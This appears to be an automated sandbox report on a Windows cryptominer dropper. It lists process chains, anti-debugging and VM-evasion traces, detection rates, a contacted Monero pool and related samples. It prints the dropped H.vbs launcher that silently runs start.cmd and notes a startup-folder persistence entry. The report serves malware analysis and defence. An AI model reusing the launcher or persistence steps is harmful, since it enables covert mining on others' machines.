Source: C:\ProgramData\BitTorrentAntivirus.exe	RDTSC instruction interceptor: First address: 00007FF65DEB855F second address: 00007FF65DEB8567 instructions: 0x00000000 rdtsc 0x00000002 inc ebp 0x00000003 movsx eax, sp 0x00000006 inc ecx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\ProgramData\BitTorrentAntivirus.exe	RDTSC instruction interceptor: First address: 00007FF65E73BD2F second address: 00007FF65E73BD37 instructions: 0x00000000 rdtsc 0x00000002 inc ebp 0x00000003 movsx eax, sp 0x00000006 inc ecx 0x00000007 pop ebx 0x00000008 rdtsc

Source: C:\ProgramData\BitTorrentAntivirus.exe TID: 6708

Thread sleep count: 9985 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

Dropped PE file which has not been started: C:\ProgramData\WinRing0x64.sys

Jump to dropped file

Source: C:\ProgramData\BitTorrentAntivirus.exe

Window / User API: threadDelayed 9985

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\ProgramData\BitTorrentAntivirus.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E7E03A VirtualQuery,GetSystemInfo,

0_2_00E7E03A

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6A7E7 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00E6A7E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7BB70 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00E7BB70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8ADB8 FindFirstFileExA,	0_2_00E8ADB8

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

graph_0-24911

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: BitTorrentAntivirus.exe, 00000004.00000002.599062569.00000204DE997000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.598737932.000001B333802000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: wscript.exe, 00000005.00000002.290152271.0000014D0181E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
Source: svchost.exe, 00000006.00000002.598950107.000001B33383C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.598798360.000001CD40029000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E7F1B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00E7F1B5

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E8BAA0 GetProcessHeap,

0_2_00E8BAA0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E8780E mov eax, dword ptr fs:[00000030h]

0_2_00E8780E

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7F303 SetUnhandledExceptionFilter,	0_2_00E7F303
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7F1B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00E7F1B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7F4CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00E7F4CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8898F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00E8898F

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\H.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\BitTorrentAntivirus.exe BitTorrentAntivirus.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.cmd" "	Jump to behavior

Source: conhost.exe, 00000003.00000002.599320919.000001BCB58D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: conhost.exe, 00000003.00000002.599320919.000001BCB58D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000003.00000002.599320919.000001BCB58D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000003.00000002.599320919.000001BCB58D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00E7A8CC

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E7F00B cpuid

0_2_00E7F00B

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E7D891 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00E7D891

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E6AEE5 GetVersionExW,

0_2_00E6AEE5

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	1 Masquerading	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	11 Scripting	2 Registry Run Keys / Startup Folder	12 Process Injection	11 Virtualization/Sandbox Evasion	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	1 DLL Side-Loading	2 Registry Run Keys / Startup Folder	12 Process Injection	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Scripting	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	135 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	51%	ReversingLabs	Win32.Trojan.Miner
file.exe	69%	Virustotal		Browse
file.exe	100%	Avira	TR/Drop.Miner.klmyp
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\benchmark_10M.cmd	100%	Avira	PUA/CoinMiner.XK
C:\ProgramData\BitTorrentAntivirus.exe	100%	Avira	HEUR/AGEN.1324411
C:\ProgramData\benchmark_1M.cmd	100%	Avira	PUA/CoinMiner.UM
C:\ProgramData\rtm_ghostrider_example.cmd	100%	Avira	PUA/CoinMiner.MB
C:\ProgramData\BitTorrentAntivirus.exe	100%	Joe Sandbox ML
C:\ProgramData\BitTorrentAntivirus.exe	71%	ReversingLabs	Win64.Trojan.Barys
C:\ProgramData\BitTorrentAntivirus.exe	60%	Virustotal		Browse
C:\ProgramData\WinRing0x64.sys	5%	ReversingLabs
C:\ProgramData\WinRing0x64.sys	2%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://miningpoolstats.stream/monero	0%	Avira URL Cloud	safe
https://miningpoolstats.stream/raptoreum	0%	Avira URL Cloud	safe
https://miningpoolstats.stream/raptoreum	0%	Virustotal		Browse
https://miningpoolstats.stream/monero	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pool-fr.supportxmr.com	141.94.96.71	true	false		high
pool.supportxmr.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000E.00000003.509371306.000001F474C31000.00000004.00000020.00020000.00000000.sdmp	false		high
https://miningpoolstats.stream/monero	pool_mine_example.cmd.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://miningpoolstats.stream/raptoreum	rtm_ghostrider_example.cmd.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000E.00000003.509371306.000001F474C31000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000E.00000003.509371306.000001F474C31000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000E.00000003.509371306.000001F474C31000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.94.96.71	pool-fr.supportxmr.com	Germany		680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	861727
Start date and time:	2023-05-09 02:18:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.expl.evad.mine.winEXE@21/24@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.8% (good quality ratio 94.9%) Quality average: 79% Quality standard deviation: 27.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 126 Number of non-executed functions: 92
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:19:10	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H.vbs.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
141.94.96.71	file.exe	Get hash	malicious	Xmrig	Browse
	KMSPicoSetup.exe	Get hash	malicious	Xmrig	Browse
	target.ps1	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	LoaderBot, Xmrig	Browse
	file.exe	Get hash	malicious	RHADAMANTHYS, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	PrivateLoader, RHADAMANTHYS, Xmrig	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pool-fr.supportxmr.com	file.exe	Get hash	malicious	Xmrig	Browse	141.94.96.144
	GoogleUpdate.exe	Get hash	malicious	Xmrig	Browse	141.94.96.144
	KMSPicoSetup.exe	Get hash	malicious	Xmrig	Browse	141.94.96.195
	WvWlWr2HC0.exe	Get hash	malicious	LoaderBot, RedLine, SmokeLoader, Vidar, Xmrig, zgRAT	Browse	141.94.96.144
	spread.exe	Get hash	malicious	ETERNALBLUE, Xmrig	Browse	141.94.96.144
	target.ps1	Get hash	malicious	Xmrig	Browse	141.94.96.144
	Activator.exe	Get hash	malicious	Xmrig	Browse	141.94.96.144
	d.py	Get hash	malicious	PwnRig Miner	Browse	141.94.96.71
	file.exe	Get hash	malicious	LoaderBot, Xmrig	Browse	141.94.96.195
	PYnsVrS3EX.exe	Get hash	malicious	Xmrig	Browse	141.94.96.71
	PYnsVrS3EX.exe	Get hash	malicious	Xmrig	Browse	141.94.96.71
	file.exe	Get hash	malicious	RHADAMANTHYS, RedLine, Xmrig	Browse	141.94.96.71
	DHL ORIGINAL DOCUMENTS.exe	Get hash	malicious	RHADAMANTHYS, Xmrig	Browse	141.94.96.71
	DHL Original Documents.exe	Get hash	malicious	RHADAMANTHYS, Xmrig	Browse	141.94.96.144
	file.exe	Get hash	malicious	RHADAMANTHYS, Vidar, Xmrig	Browse	141.94.96.71
	file.exe	Get hash	malicious	PrivateLoader, RHADAMANTHYS, Xmrig	Browse	141.94.96.71
	4K3qxRG6WM.exe	Get hash	malicious	LoaderBot, Xmrig	Browse	141.94.96.71
	SecuriteInfo.com.Trojan.Siggen19.4846.9932.10970.exe	Get hash	malicious	Xmrig	Browse	141.94.96.195
	SecuriteInfo.com.Win32.PWSX-gen.2031.32670.exe	Get hash	malicious	Eternity Stealer, Eternity Worm, Xmrig	Browse	141.94.96.195
	xxx.elf	Get hash	malicious	Xmrig	Browse	141.94.96.195

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	file.exe	Get hash	malicious	Xmrig	Browse	141.94.96.144
	29sbbAAUwY.elf	Get hash	malicious	Mirai	Browse	134.245.52.186
	2YVdesjGIA.elf	Get hash	malicious	Mirai	Browse	134.245.75.55
	u.elf	Get hash	malicious	Unknown	Browse	212.201.98.66
	https://clubpremier.page.link/?link=https://member.clubpremier.com/check-unique-id/yLOGA98YuTQtOxWSQM8wmS7gfLsfgGJBTA6AdBfEllmkgsZydtl2UYCYbaMq4SwfQjIJa8CItWIZQcJVpQizGfG9JoGRCEVfHc6DAYUnIEIA1onWBzlAS1584StSCL5bUosLYxuK2Z8xE609YjzXKu18SnaFHBg5noPyyXcQG3igmrGL6RSUjR2J2yx2StcURSdE0XNuaerRvLokksyFwZNsTmO3aCEZ2AoJXQEVyVRiiLoBEBLm9KhlzGx9cKx&apn=com.clubpremier.loyalty.android&afl=https://member.clubpremier.com/check-unique-id/yLOGA98YuTQtOxWSQM8wmS7gfLsfgGJBTA6AdBfEllmkgsZydtl2UYCYbaMq4SwfQjIJa8CItWIZQcJVpQizGfG9JoGRCEVfHc6DAYUnIEIA1onWBzlAS1584StSCL5bUosLYxuK2Z8xE609YjzXKu18SnaFHBg5noPyyXcQG3igmrGL6RSUjR2J2yx2StcURSdE0XNuaerRvLokksyFwZNsTmO3aCEZ2AoJXQEVyVRiiLoBEBLm9KhlzGx9cKx&isi=592240448&ibi=com.clubpremier.loyalty.iphone&ifl=https://member.clubpremier.com/check-unique-id/yLOGA98YuTQtOxWSQM8wmS7gfLsfgGJBTA6AdBfEllmkgsZydtl2UYCYbaMq4SwfQjIJa8CItWIZQcJVpQizGfG9JoGRCEVfHc6DAYUnIEIA1onWBzlAS1584StSCL5bUosLYxuK2Z8xE609YjzXKu18SnaFHBg5noPyyXcQG3igmrGL6RSUjR2J2yx2StcURSdE0XNuaerRvLokksyFwZNsTmO3aCEZ2AoJXQEVyVRiiLoBEBLm9KhlzGx9cKx	Get hash	malicious	Unknown	Browse	141.94.170.77
	http://webpich1ncha.vastserve.com/loig/?i=2	Get hash	malicious	Unknown	Browse	141.94.74.51
	DZAeTv0VWs.elf	Get hash	malicious	Mirai	Browse	149.220.194.191
	http://actualizaraqui3.byethost14.com/	Get hash	malicious	Unknown	Browse	141.94.74.51
	Cj1mRQdRCL.elf	Get hash	malicious	Mirai, Moobot	Browse	128.140.211.219
	PNUGTuZahh.elf	Get hash	malicious	Mirai, Moobot	Browse	141.76.161.1
	v63K1OYjob.elf	Get hash	malicious	Mirai	Browse	141.46.244.240
	https://opencaptchahere.top/ms/robot4/?c=b93ede38-67f7-42fa-b55a-532490cc1a3c&a=l118215	Get hash	malicious	GRQ Scam	Browse	141.95.108.246
	I9zGWtyw6R.elf	Get hash	malicious	Mirai	Browse	139.21.213.59
	picasa-3.9.141.303-installer_8atA-M1.exe	Get hash	malicious	Unknown	Browse	141.94.171.214
	picasa-3.9.141.303-installer_8atA-M1.exe	Get hash	malicious	Unknown	Browse	141.95.33.111
	wMy651RIIk.elf	Get hash	malicious	Moobot	Browse	141.75.107.247
	uUiFlCKiYP.elf	Get hash	malicious	Mirai, Moobot	Browse	141.74.3.135
	rFCWZi52k0.elf	Get hash	malicious	Moobot	Browse	141.71.172.233
	IyzGYbCJ9N.elf	Get hash	malicious	Moobot	Browse	139.13.211.117
	gOQlgvVx2H.elf	Get hash	malicious	Mirai, Moobot	Browse	141.43.251.214

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\WinRing0x64.sys	9zi15Ni7Wg.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	NBLe3nmUpT.exe	Get hash	malicious	Discord Token Stealer, Xmrig	Browse
	file.exe	Get hash	malicious	MinerDownloader, RedLine, Xmrig	Browse
	updater.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Fabookie, Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	MinerDownloader, RedLine, Xmrig	Browse
	ex6KGPBGCC.exe	Get hash	malicious	MinerDownloader, RedLine, Xmrig	Browse
	AjYB11aBv7.exe	Get hash	malicious	Amadey, Fabookie, Xmrig	Browse
	setup.EXE.exe	Get hash	malicious	Xmrig	Browse
	7aqYJ5Mnxz.exe	Get hash	malicious	MinerDownloader, RedLine, Xmrig	Browse
	file.exe	Get hash	malicious	MinerDownloader, RedLine, Xmrig	Browse
	V1lIaJpTZP.exe	Get hash	malicious	MinerDownloader, Nymaim, RedLine, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	MinerDownloader, Laplas Clipper, RedLine, Xmrig	Browse
	setup.exe	Get hash	malicious	Xmrig	Browse
	DEVMI.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	MinerDownloader, Laplas Clipper, RedLine, Vidar, Xmrig	Browse
	setup.exe	Get hash	malicious	Amadey, Fabookie, Xmrig	Browse

Created / dropped Files

C:\ProgramData\BitTorrentAntivirus.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8552960
Entropy (8bit):	7.944207914659506
Encrypted:	false
SSDEEP:	196608:J1H6AvK0L5D1ZFOdshqCeH3p8nlqLb6YVaUqX3BXU3T7:JIAhLPfEsAOlkGYkBX+
MD5:	686986CF6A5FD23DE42A436BF83F78D3
SHA1:	A5F84703F04880FC536524A2E0A71EB6D8EAA549
SHA-256:	7F242049AB823EB5A2862101FFDBF8ECE53B7D8771D265F64F18435A8E88155E
SHA-512:	A47406D6990413E4AAC42BEA0DAFAFBCD85618863F95DAE795785E037DB9EA4F9B69A67DE1508B0E677EF6090AC889C77B20C75AD78F8C7ECD3348A2F99BB2A9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71% Antivirus: Virustotal, Detection: 60%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...:E.d...............&..^..h}...2.Z..........@..............................i......#....`... .............................................."#.@.....h..0....e...............h............................. ...X.....................M.`............................text.....^.........................`..`.data...`.....^.....................@....rdata........_.....................@..@.pdata..<.....u.....................@..@.xdata.......x.....................@..@.bss......2...\|..........................idata...F..........................@....CRT....h..........................@....tls...............................@....vmp0....y7.........................`..`.vmp1...,<.......>..................`..h.reloc........h......N..............@..@.rsrc....0....h..2...P..............@...........................................................................................

C:\ProgramData\H.vbs

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	103
Entropy (8bit):	4.602843950460184
Encrypted:	false
SSDEEP:	3:Zy2iopFlSHFoFEm8nhNNAJF3QBWuLpJFX8lSHFoOUC:ZliopLiGNqhNS4LJFXKiVUC
MD5:	2CC16049A157397BD711823EBB78A589
SHA1:	48B8B57D83F3D2755F0F670FCCE1AC4CF2EDD28E
SHA-256:	066AE552DDE12ABFF68247BF88569B0B218DC7F24752111004454D45DE075980
SHA-512:	A0689FE31B1D87E5ECF61BC495174C0F8C32E8C6A8B4AA68218E94CF49332F1F78D7F3EBFF5B76FDB2B412674FCB1FFE634CD438D4B3AF8A577C5712795218EE
Malicious:	false
Preview:	Dim WShell..Set WShell = CreateObject("WScript.Shell")..WShell.Run "start.cmd", 0..Set WShell = Nothing

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_NcbService_c3fd3c3f830283a6ba0c7e839e220c16a1c8146_00000000_0c1abfca\Report.wer

Download File

Process:	C:\Windows\System32\wermgr.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8234109023830295
Encrypted:	false
SSDEEP:	96:bsicr51MYSgGgkgOpXItJ+HbHgS3gePnMXh88WAfvTvbcNibkUDyC1mOjQq7YAqd:er5StgY1jwxNSo/u7sCwS274lt
MD5:	3BE462FCBE8950DB57F1E853404BA9BE
SHA1:	6CE0737411CFCB029000478E0B9E5F16FC88DF77
SHA-256:	44F89C8DB14DF15566C494AD971C6A4CFC023547709F497CD89F1B6AC30797F2
SHA-512:	BAF3C66D4FDF87C400680CC1A4C518AF8144F83E99CF25C7243D9B6BDCB7BCE9031605648B230604EB42EEFDBA477FDC771D30D92046AA7793D27DC50ACA99D4
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.S.e.r.v.i.c.e.H.a.n.g.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.8.0.9.7.6.4.0.4.4.6.8.0.1.5.....R.e.p.o.r.t.T.y.p.e.=.3.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.d.6.d.9.9.f.-.6.9.9.8.-.4.e.b.6.-.9.e.f.4.-.c.7.a.a.1.c.f.b.b.4.7.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.6.0.-.0.0.0.0.-.0.0.1.f.-.c.b.3.d.-.8.9.5.5.5.7.8.2.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.6.0.b.7.6.b.6.f.b.8.0.2.4.1.7.d.5.1.3.a.d.c.9.6.7.c.5.c.a.f.7.7.f.c.2.b.a.c.6.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.5.6././.1.2././.1.2.:.0.8.:.2.8.:.3.4.!.1.7.e.f.9.!.s.v.c.h.o.s.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.6.4.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.9.5.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.S.e.r.v.i.c.e. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.N.c.b.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4896.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\wermgr.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	4890
Entropy (8bit):	3.707942741427051
Encrypted:	false
SSDEEP:	96:RtIU6o7r3GLt3iwPaj7zYr74SfoCasBCaMOdBm:Rrl7r3GLNiwPaj7zYr74SlCpOdBm
MD5:	B5378A724E477682D249CA3170AD7FE9
SHA1:	A1B1A897A270341417D068CA603F4CAD87EAB343
SHA-256:	5E1C05560C697C69F43124AC05A9FF63528FA9FE13ED1F7DD007926EB0D164D5
SHA-512:	411D9646CA07680FF6552ABA4E8807B2914955D8D85359D652E11A7895C9A18FDAAA1C57F5D457FED5A760CCB766C9134E15F9C063F87D3A8B91063457262925
Malicious:	false
